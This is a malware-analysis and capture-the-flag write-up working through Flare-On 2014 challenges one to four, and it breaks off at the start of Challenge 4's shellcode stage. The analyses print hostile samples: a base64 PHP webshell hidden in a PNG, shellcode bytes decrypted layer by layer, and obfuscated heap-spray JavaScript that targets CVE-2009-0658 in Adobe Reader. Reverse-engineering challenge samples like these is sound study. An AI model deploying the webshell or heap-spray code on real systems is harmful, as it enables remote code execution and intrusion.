By saving this as a binary (executable) file, we can then run using pecli and see this is the file which not only contains the winexec imported function of kernel32.dll, but also the URLDownloadToFile function of URLMON.DLL which indicates it will likely download and execute a file.

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/~]
└─$ file Lab01-04_res.exe

Lab01-04_res.exe: PE32 executable for MS Windows 4.00 (GUI), Intel i386, 3 sections

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ pecli info Lab01-04_res.exe

Imports
================================================================================
...
urlmon.dll
        0x40204c URLDownloadToFileA
...

Flare-On 2014 Jan 2026

Sun, 18 Jan 2026 00:00:00 GMT

Category: Malware Analysis and Reverse Engineering
Difficulty: Easy/Medium/Hard
File:- 2014_FLAREOn_Challenges.zip

Challenge 1 - Bob Doge

Stage 1 Extracting CAB File

Initial Triage

File Type: PE32+ executable for MS Windows 5.02 (GUI), x86-64, 6 sections
Size: 279 KB
SHA256: f8aac4d0cccabd11d7b10d63dc2acc451ea832077650971d3c66834861162981

Basic Static Analysis:

Detect it Easy (Die) show that this file is self-extracted CAB/SFX style packing, where the executable includes a compressed Microsoft Cabinet file (CAB) and extracts/executes it at runtime and it is just a wrapper/loader.
The .rsrc section is compressed, which is why the tool flags high entropy, classic sign of packing or encryption.
Compression algorithm used inside the CAB is LZX (as shown), which is common in Microsoft CAB archives.
So we have to first extract the actual exe from this and analyze it,

We can extract it using cabextract tool, and it will written in Challenge1.exe file,

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[/]
└─$ cabextract C1.exe.defused
Extracting cabinet: C1.exe.defused
  extracting Challenge1.exe

All done, no errors.

Stage 2 Analysis of .NET Sample

Initial Triage

File Type: PE32 executable for MS Windows 4.00 (GUI), Intel i386 Mono/.Net assembly, 3 sections
Size: 118 KB
SHA256: c1b55c829a8420fa41e7a31344b6427045cea288458fe1c0f32cae47b2e812f2

Basic Static Analysis:

Detect it Easy (Die) show that this file is .NET binary written in C# using visual studio.
Also .text is packed as per die because it show high entropy in it.

We know that this code compiles to Microsoft Intermediate Language (MSIL or IL).
IL is a human-readable, high-level assembly-like language, not raw CPU instructions.
So we can read it using tools such as dnSpy, Dotpeek etc.
here is the example of IL,

.method public hidebysig static void Main() cil managed
{
    .entrypoint
    ldstr "Hello, world!"
    call void [mscorlib]System.Console::WriteLine(string)
    ret
}

Code Analysis

I used dnSpy for this analysis,
In Resources i found something phishy which is rev_challenge_1.dat_secret.encode so i saved it and it looks like encrypted data,
Also some cool memes 😂,

Now Let's dive into actual code, so typically we start with main function in Program section,
This code just starts a Windows Forms GUI app and opens Form1 so Form1 is the one we had to go,

Immediately we see one function btnDecode_Click which do some kind of math or crypto stuff, and it is loading that rev_challenge_1.dat_secret.encode file as input.

At first glance, honestly, I can't understand this code, so I take help from our friend GPT to explain it to me, and here is what I understand,

0xa1 0xb5 0x44        (original)
0x1a 0x5b 0x44        (swap hex digits)
(0x1a ^ 0x29) (0x5b ^ 0x29) (0x44 ^ 0x29) → 0x33 0x72 0x6d

Flag Extraction

So i load this input file into CyberChef and apply all the necessary filters and features to get decrypted result and here it is,

Here is out flag,

 3rmahg3rd.b0b.d0ge@flare-on.com

Here is recipe of this,

[
  { "op": "To Hex",
    "args": ["Space", 0] },
  { "op": "Remove whitespace",
    "args": [true, true, true, true, true, false] },
  { "op": "Find / Replace",
    "args": [{ "option": "Regex", "string": "([0-9a-fA-F])([0-9a-fA-F])" }, "$2$1", true, false, true, false] },
  { "op": "Remove whitespace",
    "args": [true, true, true, true, true, false] },
  { "op": "From Hex",
    "args": ["Auto"] },
  { "op": "XOR",
    "args": [{ "option": "Decimal", "string": "41" }, "Standard", false] }
]

Here is the similar py script for doing this same task,

#!/usr/bin/env python3
"""
Replicates CyberChef operations:
1. From Hexdump
2. To Hex (space delimited)
3. Remove whitespace
4. Find/Replace (swap hex digit pairs)
5. Remove whitespace
6. From Hex
7. XOR with 41 (decimal)
"""

import re
import sys

def from_hexdump(data):
    """Extract hex bytes from hexdump format"""
    lines = data.strip().split('\n')
    hex_bytes = []
    
    for line in lines:
        # Remove offset and ASCII representation, keep only hex bytes
        parts = line.split()
        for part in parts:
            # Skip offset (contains colon) and non-hex parts
            if ':' in part or not all(c in '0123456789abcdefABCDEF' for c in part):
                continue
            # Add hex bytes (typically 2 chars each)
            for i in range(0, len(part), 2):
                if i + 1 < len(part):
                    hex_bytes.append(part[i:i+2])
    
    return bytes.fromhex(''.join(hex_bytes))

def to_hex_space(data):
    """Convert bytes to space-separated hex"""
    return ' '.join(f'{b:02x}' for b in data)

def remove_whitespace(text):
    """Remove all whitespace"""
    return re.sub(r'\s+', '', text)

def swap_hex_pairs(text):
    """Swap each pair of hex digits: AB -> BA"""
    return re.sub(r'([0-9a-fA-F])([0-9a-fA-F])', r'\2\1', text)

def from_hex(hex_string):
    """Convert hex string to bytes"""
    return bytes.fromhex(hex_string)

def xor_decrypt(data, key):
    """XOR each byte with the key"""
    return bytes(b ^ key for b in data)

def main():
    input_file = 'rev_challenge_1.dat_secret.encode'
    
    try:
        # Read input file in binary mode
        with open(input_file, 'rb') as f:
            data = f.read()
        
        print(f"[+] Reading from {input_file}")
        
        # Step 1: From Hexdump - skip this step, data is already binary
        print("[+] Step 1: Using binary data directly")
        step1 = data
        
        # Step 2: To Hex (space delimited)
        print("[+] Step 2: To Hex (space delimited)")
        step2 = to_hex_space(step1)
        
        # Step 3: Remove whitespace
        print("[+] Step 3: Remove whitespace")
        step3 = remove_whitespace(step2)
        
        # Step 4: Find/Replace - swap hex digit pairs
        print("[+] Step 4: Swap hex digit pairs")
        step4 = swap_hex_pairs(step3)
        
        # Step 5: Remove whitespace (again)
        print("[+] Step 5: Remove whitespace")
        step5 = remove_whitespace(step4)
        
        # Step 6: From Hex
        print("[+] Step 6: From Hex")
        step6 = from_hex(step5)
        
        # Step 7: XOR with 41 (decimal)
        print("[+] Step 7: XOR with 41")
        result = xor_decrypt(step6, 41)
        
        # Output result
        print("\n" + "="*60)
        print("DECODED OUTPUT:")
        print("="*60)
        try:
            print(result.decode('utf-8', errors='replace'))
        except:
            print(result)
        print("="*60)
        
        # Save to file
        output_file = 'decoded_output.txt'
        with open(output_file, 'wb') as f:
            f.write(result)
        print(f"\n[+] Output saved to {output_file}")
        
    except FileNotFoundError:
        print(f"[!] Error: File '{input_file}' not found")
        print(f"[!] Please ensure the file exists in the current directory")
        sys.exit(1)
    except Exception as e:
        print(f"[!] Error: {e}")
        import traceback
        traceback.print_exc()
        sys.exit(1)

if __name__ == '__main__':
    main()

Challenge 2: Javascrap

Stage 0 Character Table Construction

Initial Triage

Challenge Type: Reverse-Engineering / Web / Obfuscated Code
Files Provided:
- home.html
  - File Type: home.html: HTML document, Unicode text, UTF-8 text, with very long lines (1428), with CRLF line terminators
  - Size: 8.17 KB
  - SHA256: d1b235e49336c2e510100bd3ffa3113d9c757ffb4829e9564597dbab8338b710
- img/flare-on.png (PNG image)
  - File Type: img/flare-on.png: PNG image data, 400 x 79, 8-bit/color RGBA, non-interlaced
  - Size: 9.33 KB
  - SHA256: 87528d13f40b51b6de90124fb92bcbc38a54e5241cd7ef969208c0707ed893dd

Basic Static Analysis:

The PNG is being included as PHP code via an include in the HTML page: i.e., the challenge hides a PHP script inside what looks like an image.

Performing strings on flare-on.png reveals appended PHP source code instead of pure image data.

The appended PHP contains two large arrays: $terms and $order, and a reconstruction loop that builds a second PHP script dynamically.

Stage 1: Obfuscation Decoding

1: Character Table Reconstruction

The embedded PHP begins:

$terms = array("M","Z","]","p",...,"|");
$order = array(59,71,73,13,...,47);
$do_me="";
for($i=0;$i<count($order);$i++){
    $do_me=$do_me.$terms[$order[$i]];
}
print($do_me);

$terms is a custom character lookup table - each entry is a single character.
$order is a list of integers, each an index into $terms.
The loop concatenates $terms[$order[i]] to form a complete PHP script string in $do_me.
Instead of running eval() immediately, you can replace it with print to dump the generated code for analysis.

Stage 2: Second-Layer Decoding

After reconstructing the inner PHP, the output looks like:

$_  = 'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlc ...';
$__ = 'JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7';
$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
eval($___($__));

$_ and $__ are Base64-encoded strings.
$___ is obfuscated with hex escape sequences representing the string base64_decode.
eval($___($__)) resolves to:

$code = base64_decode($_);
eval($code);

This decodes the next stage of the script and executes it.

Stage 3: Escaped Payload Interpretation

The inner decoded PHP is:

if (isset($_POST["\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F..."])){
    eval(base64_decode($_POST["\97\49\x31\68\x4F\x54\116\104..."]));
}

The $_POST key names are obfuscated using a mix of octal (\NNN) and hex (\xNN) escapes.
To understand the actual identifier, all escape sequences must be converted into ASCII.

Stage 4: Normalization and Flag Extraction

The decoded sequence:

a11DOTthatDOTjava5crapATflareDASHonDOTcom

comes from interpreting those escape sequences as numbers and converting them to characters.
Replace placeholder tokens:

DOT → .
AT → @
DASH → -
Final flag:

a11.that.java5crap@flare-on.com

Final Behavior

The decoded PHP callback becomes:

if (isset($_POST["a11.that.java5crap@flare-on.com"])) {
    eval(base64_decode($_POST["a11.that.java5crap@flare-on.com"]));
}

This is a simple PHP webshell that executes Base64-encoded PHP from an HTTP POST field if sent under the correct key.

Challenge 3:

Stage 1 Extracting Shellcode from Wrapper EXE

Initial Triage

File Type: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Size: 7 KB
SHA256: 4ab2023b2f34c8c49ffd15a051b46b6be13cb84775142ec85403a08c0d846c72

Basic Static Analysis

Detect it Easy (Die) show that this file is C Compiled File, and Tiny C compiler was used to compile it, also it can be stripped as per file command results.
In Entropy section we can see that there is only 2 section which is .text and .data,

PEStudio Shows that most of data is on .text section and raw-size is 6144 bytes,

Advance Static Analysis

I have used IDA Free to do disassemble the exe file,
- In that i opened start function which has some interesting functions and particularly this sub_401000,

In this sub_401000 function, there are multiple bytes which are being pushed into stack and at the end it being called using this instruction,

.text:00401000 ; int __cdecl sub_401000(_DWORD, _DWORD, _DWORD)
.text:00401000 sub_401000      proc near               ; CODE XREF: start+6A↓p
.text:00401000
.text:00401000 var_201         = byte ptr -201h
.text:00401000 var_200         = byte ptr -200h
...
.text:00401000                 push    ebp
.text:00401001                 mov     ebp, esp
.text:00401003                 sub     esp, 204h
.text:00401009                 nop
.text:0040100A                 mov     eax, 0E8h
.text:0040100F                 mov     [ebp+var_201], al
.text:00401015                 mov     eax, 0
.text:0040101A                 mov     [ebp+var_200], al
...
.text:00402492                 mov     [ebp+var_1], al
.text:00402495                 lea     eax, [ebp+var_201]
.text:0040249B                 call    eax

It means it means it can shellcode because 0E8h is being pushed, it means call target,
but why this importent,
- Shellcode has a huge problem: It does NOT know its own address
  - it can be placed anywhere in memory
  - no imports
  - no fixed base
  - no PE headers

Advanced Dynamic Analysis

So to extract the shellcode we will use x32dbg because we have 32 bit binary and put a breakpoint in this particular 0040249B offset which is call eax so we will dump EAX into memory and carve it and move further.
But first we land in entry point of program,

004024C0 | 55                       | push ebp                                
004024C1 | 89E5                     | mov ebp,esp                             
004024C3 | 81EC 2C000000            | sub esp,2C

So we can go to that location using CTRL + G shortcut,

We will put breakpoint using using F2 in that instruction,

00402495 | 8D85 FFFDFFFF            | lea eax,dword ptr ss:[ebp-201]          
0040249B | FFD0                     | call eax                                
0040249D | B8 00000000              | mov eax,0

So now we will run till this breakpoint and dump the EAX content inside the dump windows,
And again we can see that there is E8 00 00.. format which means it will be shellcode so we can dump this using this command,

savedata "C:\Users\Asus\Desktop\shellcode.bin", EAX, 0x4000

So it will be written in shellcode.bin,

Stage 2 Analyzing Shellcode

Initial Triage

File Type: data
Size: 16 KB
SHA256: 7d60f98eaa49863a604f75425ced94f86faf2eb9d83e0c1ce7490c852930f44e

Advance Static Analysis

To get the hex code we can use HxD tool and copy from there and I used cutter for this analysis because it gives graph view, so paste it into that cutter,

I remove some bytes which are not that important, after 0xC995,

E8 00 00 00 00 8B 34 24 83 C6 1C B9 DF 01 00 00 83 F9 00 74 07 80 36 66 46 49 EB F4 E9 10 00 00 00 07 08 02 46 15 09 46 0F 12 46 04 03 01 0F 08 15 0E 13 15 66 66 0E 15 07 13 14 0E 08 09 16 07 EF 85 8E 66 66 66 66 ED 52 42 E5 A0 4B EF 97 E7 A7 EA 67 66 66 EF BE E5 A6 6C 5F BE 13 63 EF 85 E5 A5 62 5F A8 12 6E EC 75 56 70 25 20 8D 8D 8F 57 66 66 66 6F 6C 62 27 67 62 72 70 6A 35 7C 66 36 60 70 73 33 7A 7C 65 2F 6C 72 27 66 68 33 70 72 78 66 29 7E 66 67 63 33 7D 7D 35 7C 61 73 27 65 66 7A 7A 67 FD 08 09 16 07 9E 33 37 97 D5 0B B1 31 17 07 15 84 EA 14 6D 1B 89 3F 74 48 79 40 90 D2 17 96 E1 0D FD EA FA C8 7F 53 71 5A E9 CE 74 48 79 40 E1 CB EF C2 02 34 45 61 48 20 5F 3C 07 3F 0C 23 1B 3B 0D 28 05 7B 1E 3E 02 2F 09 60 1E 20 10 3E 16 7A ED AD 9C 48 79 40 71 D0 4B 76 E9 80 57 C9 86 C9 BE 85 71 5A 64 C7 AC CB B9 58 48 83 0A 57 E3 A5 F9 83 73 71 B1 27 79 D0 77 7E 62 0B 3F AB 9A B2 62 52 6A 46 66 58 73 00 38 15 39 00 21 5F 25 15 24 1E 32 1E 1F 5B 70 42 7A 1A 7B 18 7E 10 75 15 60 55 3A 55 0D 60 78 17 61 4D 7C 5A 7A 46 26 40 65 0D 31 0B 6F 4B 72 09 71 52 D8 D1 E3 72 0B 2A 17 A4 30 18 DC FA 2F B6 E7 F0 94 06 16 2D 16 F2 CE A2 8A 3D 37 B8 63 21 9B DF 81 ED 40 18 CC 59 03 F5 43 54 06 7C 4B 8D F8 63 E4 F2 5A 76 FA 4A E6 53 62 90 66 13 FF 0C 60 88 4D 38 FF 5E F1 77 7B 7D 40 E1 F0 8E 7B 7C 5B D4 30 39 2A 9E F6 38 49 1F F0 28 99 95 4B F2 61 DB 62 D0 56 48 05 22 12 29 8A D2 45 49 20 75 0D 3F 48 AC F3 29 52 07 A3 34 BB 7F 05 98 10 58 72 C8 E6 67 9D E0 75 88 1B 66 55 73 76 24 1C 7F 19 0D 46 2F 25 35 14 8D 80 B2 2E 4B 01 80 32 1C 95 C9 00

It is loop that doing some stuff,
- The CALL instruction is not for calling a function
- It is used to steal the current address so the code can decrypt and execute itself.
- So it means call 5 will pushes 0x00000005 onto stack jumps to 0x00000005 now stack has [rsp] = address_of_shellcode then mov esi, [rsp] will push it into esi which means 0x05 + 0x1C = 0x21,
seg000:00000021 to seg000:00000030 is encrypted block,

0x00000000      call    5          ;  fcn.00000000(void)
0x00000005      mov     esi, dword [rsp]
0x00000008      add     esi, 0x1c
0x0000000b      mov     ecx, 0x1df
0x00000010      cmp     ecx, 0

Decryption block with key 0x66

0x00000015  xor byte [rsi], 0x66
0x00000018  jmp 0x10

So here is the whole summarized flow,

call → pop → add offset → xor loop (key 0x66) → jump

Possible Pseudocode,

base = get_rip();
payload = base + 0x1c;

for (i = 0; i < 0x1df; i++) {
    payload[i] ^= 0x66;
}

jump_to(payload);

There is one block which is encrypted so i used, cyberchef to decrypt it with key 0x66

Decrypted String 1,

and so it begins

But you can see how tedious is this task in static analysis so to do this easiness we can use dynamic method.

Advanced Dynamic Analysis

Again, i can use x32dgb for this task,

Layer 1 XORed Encryption

This loop is doing decryption of encrypted text

0019FD43 | 83F9 00                  | cmp ecx,0                               
0019FD46 | 74 07                    | je 19FD4F
0019FD48 | 8036 66                  | xor byte ptr ds:[esi],66               
0019FD4B | 46                       | inc esi                                 
0019FD4C | 49                       | dec ecx     
0019FD4D | EB F4                    | jmp 19FD43

0019FD53 00 61 6E 64 20 73 6F 20 69 74 20 62 65 67 69 6E  .and so it begin  
0019FD63 73 68 75 73 00 00 68 73 61 75 72 68 6E 6F 70 61  shus..hsaurhnopa

Decrypted String 1,

so it begins

Layer 2 XORed Encryption

for next layer just step through the instructions by doing step over,
This instructions are loading layer 2 decryption key in stack which is

0019FD69 | 68 73617572              | push 72756173                           
0019FD6E | 68 6E6F7061              | push 61706F6E                          
0019FD73 | 89E3                     | mov ebx,esp

Here is actual key in hex 6E 6F 70 61 72 73 61 75 72 75 73 which is nopasaurus,

Now the actual loop begins and decryption starts using this key nopasaurus,

0019FD8D | 39D8                     | cmp eax,ebx                             
0019FD8F | 75 05                    | jne 19FD96                              
0019FD91 | 89E3                     | mov ebx,esp                             
0019FD93 | 83C3 04                  | add ebx,4                               
0019FD96 | 39CE                     | cmp esi,ecx                             
0019FD98 | 74 08                    | je 19FDA2                               
0019FD9A | 8A13                     | mov dl,byte ptr ds:[ebx]                
0019FD9C | 3016                     | xor byte ptr ds:[esi],dl                
0019FD9E | 43                       | inc ebx                                 
0019FD9F | 46                       | inc esi                                
0019FDA0 | EB EB                    | jmp 19FD8D

0019FDA6 00 67 65 74 20 72 65 61 64 79 20 74 6F 20 67 65  .get ready to ge  
0019FDB6 74 20 6E 6F 70 27 65 64 20 73 6F 20 64 61 6D 6E  t nop'ed so damn  
0019FDC6 20 68 61 72 64 20 69 6E 20 74 68 65 20 70 61 69   hard in the pai  
0019FDD6 6E 74 E8 00 00 00 00 8B 34 24 83 C6 1E B9 38 01  ntè.....4$.Æ.¹8.

Decrypted String 2,

get ready to get nop'ed so damn hard in the paint

Layer 3 XORed Encryption

This is where 3rd loop starts and decryption starts with hardcoded hex 0x624F6C47,

0019FDE3 | B9 38010000              | mov ecx,138                             
0019FDE8 | 83F9 00                  | cmp ecx,0                               
0019FDEB | 7E 0E                    | jle 19FDFB                              
0019FDED | 8136 624F6C47            | xor dword ptr ds:[esi],476C4F62         
0019FDF3 | 83C6 04                  | add esi,4                               
0019FDF6 | 83E9 04                  | sub ecx,4                               
0019FDF9 | EB ED                    | jmp 19FDE8

This wrote some gibberish in memory,

0019FDF6 83 E9 04 EB ED 8D 80 00 00 00 00 8D 80 00 00 00  .é.ëí...........  
0019FE06 00 90 90 90 90 68 72 3F 21 3F 68 20 6F 76 65 68  .....hr?!?h oveh  
0019FE16 6D 6F 73 74 68 74 20 61 6C 68 69 73 20 69 68 6F  mostht alhis iho  
0019FE26 6D 67 20 89 E3 E8 00 00 00 00 8B 34 24 83 C6 2D  mg .ãè.....4$.Æ-

After spending some time i realize that it is actually strings which is being loaded next,

0019FE0B | 68 723F213F              | push 3F213F72                           
0019FE10 | 68 206F7665              | push 65766F20                           
0019FE15 | 68 6D6F7374              | push 74736F6D                           
0019FE1A | 68 7420616C              | push 6C612074                           
0019FE1F | 68 69732069              | push 69207369                           
0019FE24 | 68 6F6D6720              | push 20676D6F                           
0019FE29 | 89E3                     | mov ebx,esp

I take all hex convert it in Big endian format and arrange it in FILO (First in Last out) order because it is loaded in stack so here is the strings,
Interestingly this same text used as key for next layer.

omg i sit almost over?!?

Layer 4 XORed Encryption

Here is loop which start with previous string as key for decryption routine,

0019FE43 | 39D8                     | cmp eax,ebx                             
0019FE45 | 75 05                    | jne 19FE4C                              
0019FE47 | 89E3                     | mov ebx,esp                             
0019FE49 | 83C3 04                  | add ebx,4                               
0019FE4C | 39CE                     | cmp esi,ecx                             
0019FE4E | 74 08                    | je 19FE58                               
0019FE50 | 8A13                     | mov dl,byte ptr ds:[ebx]                
0019FE52 | 3016                     | xor byte ptr ds:[esi],dl                
0019FE54 | 43                       | inc ebx                                 
0019FE55 | 46                       | inc esi                                 
0019FE56 | EB EB                    | jmp 19FE43

0019FE56 EB EB E9 1D 00 00 00 73 75 63 68 2E 35 68 33 31  ëëé....such.5h31  
0019FE66 31 30 31 30 31 30 31 40 66 6C 61 72 65 2D 6F 6E  1010101@flare-on  
0019FE76 2E 63 6F 6D 68 6E 74 00 00 68 20 73 70 65 68 20  .comhnt..h speh

Here is Final Flag.... 😗

such.5h311010101@flare-on.com

Challenge 4:

Stage 1 Malicious PDF Analysis

Initial Triage

File Type: APT9001.pdf: PDF document, version 1.5
Size: 21 KB
SHA256: 15f3d918c4781749e3c9f470740485fa01d58fd0b003e2f0be171d80ce3b1c2c

Basic Static Analysis

Detect it Easy show nothing,
I do quick search its hash on VT this is the result,

27 out of 65 is pretty high so maybe there is some data which is embedded in PDF.

So to check that i used pdfinfo tool to see metadata of pdf and here is what is got,
- It has some js stuff so we can extract it using tool called, peepdf.

Advance Static Analysis

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~]
└─$ python2 /opt/peepdf/peepdf.py -fil APT9001.pdf

Warning: PyV8 is not installed!!
Warning: pylibemu is not installed!!
Warning: Python Imaging Library (PIL) is not installed!!

File: APT9001.pdf
MD5: f2bf6b87b5ab15a1889bddbe0be0903f
SHA1: 58c93841ee644a5d2f5062bb755c6b9477ec6c0b
SHA256: 15f3d918c4781749e3c9f470740485fa01d58fd0b003e2f0be171d80ce3b1c2c
Size: 21284 bytes
Version: 1.5
Binary: True
Linearized: False
Encrypted: False
Updates: 0
Objects: 8
Streams: 2
URIs: 0
Comments: 0
Errors: 1

Version 0:
        Catalog: 1
        Info: No
        Objects (8): [1, 2, 3, 4, 5, 6, 7, 8]
                Errors (1): [8]
        Streams (2): [6, 8]
                Encoded (2): [6, 8]
                Decoding errors (1): [8]
        Objects with JS code (1): [6]
        Suspicious elements:
                /OpenAction (1): [1]
                /JS (1): [5]
                /JavaScript (1): [5]
                Adobe JBIG2Decode Heap Corruption (CVE-2009-0658): [8]

I tried to extract the JS code using extract js > extracted.js which appeared to be successful.
Also this is mind, "Adobe JBIG2Decode Heap Corruption (CVE-2009-0658)"

PPDF> extract js

// peepdf comment: Javascript code located in object 6 (version 0)

var HdPN = "";
var zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf = "";
var IxTUQnOvHg = unescape("%u72f9%u4649%u1.....u5740%ud0ff");
var MPBPtdcBjTlpvyTYkSwgkrWhXL = "";

for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 128; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA >= 0; --EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) MPBPtdcBjTlpvyTYkSwgkrWhXL += unescape("%ub32f%u3791");
ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv = MPBPtdcBjTlpvyTYkSwgkrWhXL + IxTUQnOvHg;
OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY = unescape("%ub32f%u3791");
fJWhwERSDZtaZXlhcREfhZjCCVqFAPS = 20;
fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA = fJWhwERSDZtaZXlhcREfhZjCCVqFAPS + ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv.length
while (OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length < fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA) OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY += OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY;
UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA);
MOysyGgYplwyZzNdETHwkru = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length - fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA);
while (MOysyGgYplwyZzNdETHwkru.length + fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA < 0x40000) MOysyGgYplwyZzNdETHwkru = MOysyGgYplwyZzNdETHwkru + MOysyGgYplwyZzNdETHwkru + UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb;
DPwxazRhwbQGu = new Array();
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 0; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA < 100; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) DPwxazRhwbQGu[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = MOysyGgYplwyZzNdETHwkru + ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv;

for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 142; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA >= 0; --EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += unescape("%ub550%u0166");
bGtvKT = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length + 20
while (zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length < bGtvKT) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;
Juphd = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, bGtvKT);
QCZabMzxQiD = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length - bGtvKT);
while (QCZabMzxQiD.length + bGtvKT < 0x40000) QCZabMzxQiD = QCZabMzxQiD + QCZabMzxQiD + Juphd;
FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE = new Array();
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 0; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA < 125; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = QCZabMzxQiD + zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;

But this looks obfuscated and very messy so I cleaned it,

// peepdf comment: Javascript code located in object 6 (version 0)

var string_variable_2 = "";
var string_variable_4 = unescape("%u72f9%u4649%u152....5740%ud0ff");
var string_variable_1 = "";

for (counter_variable = 128; counter_variable >= 0; --counter_variable) string_variable_1 += unescape("%ub32f%u3791");
string_variable_3 = string_variable_1 + string_variable_4;
string_variable_5 = unescape("%ub32f%u3791");


while (string_variable_5.length < 790) string_variable_5 += string_variable_5;

substring1_of_str5 = string_variable_5.substring(0, 790);
substring2_of_str5 = string_variable_5.substring(0, string_variable_5.length - 790);

while (substring2_of_str5.length + 790 < 262144) substring2_of_str5 = substring2_of_str5 + substring2_of_str5 + substring1_of_str5;
another_array_variable = new Array();

for (counter_variable = 0; counter_variable < 100; counter_variable++) 
	another_array_variable[counter_variable] = substring2_of_str5 + string_variable_3;

for (counter_variable = 142; counter_variable >= 0; --counter_variable) 
	string_variable_2 += unescape("%ub550%u0166");

len_str2_plus20 = string_variable_2.length + 20

while (string_variable_2.length < len_str2_plus20) string_variable_2 += string_variable_2;

substring1_of_str2 = string_variable_2.substring(0, len_str2_plus20);
substring2_of_str2 = string_variable_2.substring(0, string_variable_2.length - len_str2_plus20);

while (substring2_of_str2.length + len_str2_plus20 < 262144) substring2_of_str2 = substring2_of_str2 + substring2_of_str2 + substring1_of_str2;
array_variable = new Array();

for (counter_variable = 0; counter_variable < 125; counter_variable++) array_variable[counter_variable] = substring2_of_str2 + string_variable_2;

But you might be confused that how this code will executed because it is in PDF right?
So here comes the interesting thing,
- CVE-2009-0658 is a heap corruption vulnerability in Adobe Reader’s JBIG2Decode filter.
- A malformed JBIG2 image causes memory overwrite in native code.
- JavaScript heap spray is used beforehand to populate predictable heap memory with shellcode.
- When the corrupted pointer is dereferenced, execution jumps into the sprayed heap region, leading to arbitrary code execution.
- One of the first PDF + JS + native bug chains
So in short, if any user open this code in vulnerable Adobe Reader then this code will execute.

Code Explanation

It hides malicious code
- The long %uXXXX%uXXXX data is hidden machine code / shellcode.
- unescape() converts it into real binary data.
It creates a lot of useless repeated data
- Repeated patterns are added again and again.
- This fills large parts of computer memory.
It mixes junk + malicious code
- So memory looks like: junk junk junk → malicious code
It puts this data many times into memory
- Hundreds of copies are created.
- This is called heap spraying.
Why it does this
- Later, when Adobe Reader crashes due to a bug,
  the program may jump to a random memory address.
- Because memory is full of attacker data,
  it lands on the malicious code.

Carving Next Stage

After some code reading and research i found that string_variable_4 is the var which has next stage shellcode but it is encoded in some format in js so i did research and this is what i found,
The unescape() function replaces any escape sequence with the character that it represents. Specifically, it replaces any escape sequence of the form %XX or %uXXXX (where X represents one hexadecimal digit) with the character that has the hexadecimal value XX/XXXX. If the escape sequence is not a valid escape sequence (for example, if % is followed by one or no hex digit), it is left as-is.

So to decode this i used cyberchef, and we have to convert the endianness because it is being written in heap so we will swap it by word length of 8.
We will save this as shellcode.bin

CyberChef Recipe,

[
  { "op": "Find / Replace",
    "args": [{ "option": "Simple string", "string": "%u" }, "", true, false, true, false] },
  { "op": "Swap endianness",
    "args": ["Hex", 2, true] },
  { "op": "From Hex",
    "args": ["Auto"],
    "disabled": true }
]

Stage 2 Analyzing Shellcode

Initial Triage

File Type: data
Size: 1 KB
